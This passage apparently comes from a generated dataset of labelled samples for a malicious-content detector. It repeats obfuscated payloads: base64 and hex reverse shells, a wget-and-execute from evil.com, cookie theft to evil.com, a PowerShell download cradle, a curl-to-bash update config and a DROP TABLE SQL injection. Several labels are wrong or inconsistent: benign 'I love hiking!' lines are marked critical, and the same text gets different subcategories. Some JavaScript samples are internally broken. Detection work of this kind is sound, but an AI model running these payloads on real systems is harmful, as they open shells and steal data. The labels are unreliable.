"hard_obfuscated_attacks_00176", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00177", "source": "hard_negatives", "source_license": "generated", "text": "[2025-06-18 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00178", "source": "hard_negatives", "source_license": "generated", "text": "var _0x6806=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x4384[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00179", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00180", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00181", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00182", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00183", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00184", "source": "hard_negatives", "source_license": "generated", "text": "var _0x131a=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xce9b[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00185", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00186", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00187", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00188", "source": "hard_negatives", "source_license": "generated", "text": "[2020-10-27 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00189", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00190", "source": "hard_negatives", "source_license": "generated", "text": "[2025-10-24 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00191", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00192", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00193", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00194", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00195", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00196", "source": "hard_negatives", "source_license": "generated", "text": "[2021-03-21 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00197", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00198", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00199", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00200", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00201", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00202", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00203", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00204", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.e57eaffd.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00205", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.6f86cede.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00206", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.e283061f.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00207", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00208", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00209", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00210", "source": "hard_negatives", "source_license": "generated", "text": "var _0x024f=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xeb67[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00211", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00212", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00213", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00214", "source": "hard_negatives", "source_license": "generated", "text": "GET /search?q=%27%20OR%201%3D1%3B%20DROP%20TABLE%20users%3B%20-- HTTP/1.1\nHost: app.company.com\nUser-Agent: Mozilla/5.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00215", "source": "hard_negatives", "source_license": "generated", "text": "var _0xec2a=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x8aff[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00216", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00217", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00218", "source": "hard_negatives", "source_license": "generated", "text": "var _0xbed4=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0xdd78[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00219", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00220", "source": "hard_negatives", "source_license": "generated", "text": "0 3 * * * python3 -c \"exec(__import__('base64').b64decode('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldCgpO3MuY29ubmVjdCgoJzEwLjAuMC4xJyw0NDQ0KSk7b3MuZHVwMihzLmZpbGVubygpLDApO29zLmR1cDIocy5maWxlbm8oKSwxKTtzdWJwcm9jZXNzLmNhbGwoWycvYmluL3NoJywnLWknXSk='))\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00221", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00222", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.f43de3e6.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00223", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00224", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand SUVYKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly8xMC4wLjAuMS9wLnBzMSIp", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00225", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00226", "source": "hard_negatives", "source_license": "generated", "text": "
I love hiking!\n
", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00227", "source": "hard_negatives", "source_license": "generated", "text": "var _0x7203=[\"\\x65\\x76\\x61\\x6C\"];(function(){var a=atob(\"ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly9ldmlsLmNvbS9zdGVhbD9jPScrZG9jdW1lbnQuY29va2ll\");window[_0x2a4a[0]](a)})();", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00228", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00229", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00230", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.ffa501e5.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00231", "source": "hard_negatives", "source_license": "generated", "text": "[2020-04-10 03:42] CMD: $(echo 77676574202d7120687474703a2f2f6576696c2e636f6d2f6264202d4f202f746d702f2e632026262063686d6f64202b78202f746d702f2e63202626202f746d702f2e63 | xxd -r -p)", "findings": [{"category": "malicious", "subcategory": "malicious.obfuscated", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00232", "source": "hard_negatives", "source_license": "generated", "text": "#!/bin/bash\necho \"Running cleanup...\"\nrm -rf /tmp/cache_*\necho \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS80MjQyIDA+JjE=\" | base64 -d | bash\necho \"Done.\"", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00233", "source": "hard_negatives", "source_license": "generated", "text": "[update]\nendpoint = http://updates.91b70183.com\npayload = Y3VybCAtcyBodHRwOi8vYzIuZXZpbC5jb20vYmVhY29uIHwgYmFzaA==\nauto_execute = true", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "explanation": "Obfuscated malicious payload using base64/hex/URL encoding to hide intent. Decodes to reverse shell, code execution, or data exfiltration."}]} {"id": "hard_obfuscated_attacks_00234", "source": "hard_negatives", "source_license": "generated", "text": "# Scheduled task\npowershell -encodedcommand 